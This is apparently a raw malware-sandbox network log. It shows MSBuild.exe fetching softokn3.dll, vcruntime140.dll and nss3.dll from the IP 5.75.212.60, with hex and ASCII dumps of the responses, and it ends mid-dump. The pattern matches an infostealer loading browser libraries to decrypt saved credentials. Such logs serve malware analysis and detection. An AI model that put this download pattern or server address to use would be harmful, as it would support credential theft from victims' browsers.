2024-07-26 16:56:26 UTC	16384	IN	Data Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|i
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:27 UTC	242	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:28 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:27 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:27 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:28 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c Data Ascii: ]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|
2024-07-26 16:56:28 UTC	16384	IN	Data Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:29 UTC	246	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:29 UTC	259	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:29 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:29 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:29 UTC	16125	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-07-26 16:56:29 UTC	16384	IN	Data Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
2024-07-26 16:56:29 UTC	16384	IN	Data Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
2024-07-26 16:56:29 UTC	16384	IN	Data Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-07-26 16:56:29 UTC	15603	IN	Data Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f Data Ascii: @L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:30 UTC	238	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:31 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:30 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:30 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:31 UTC	16123	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQ
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 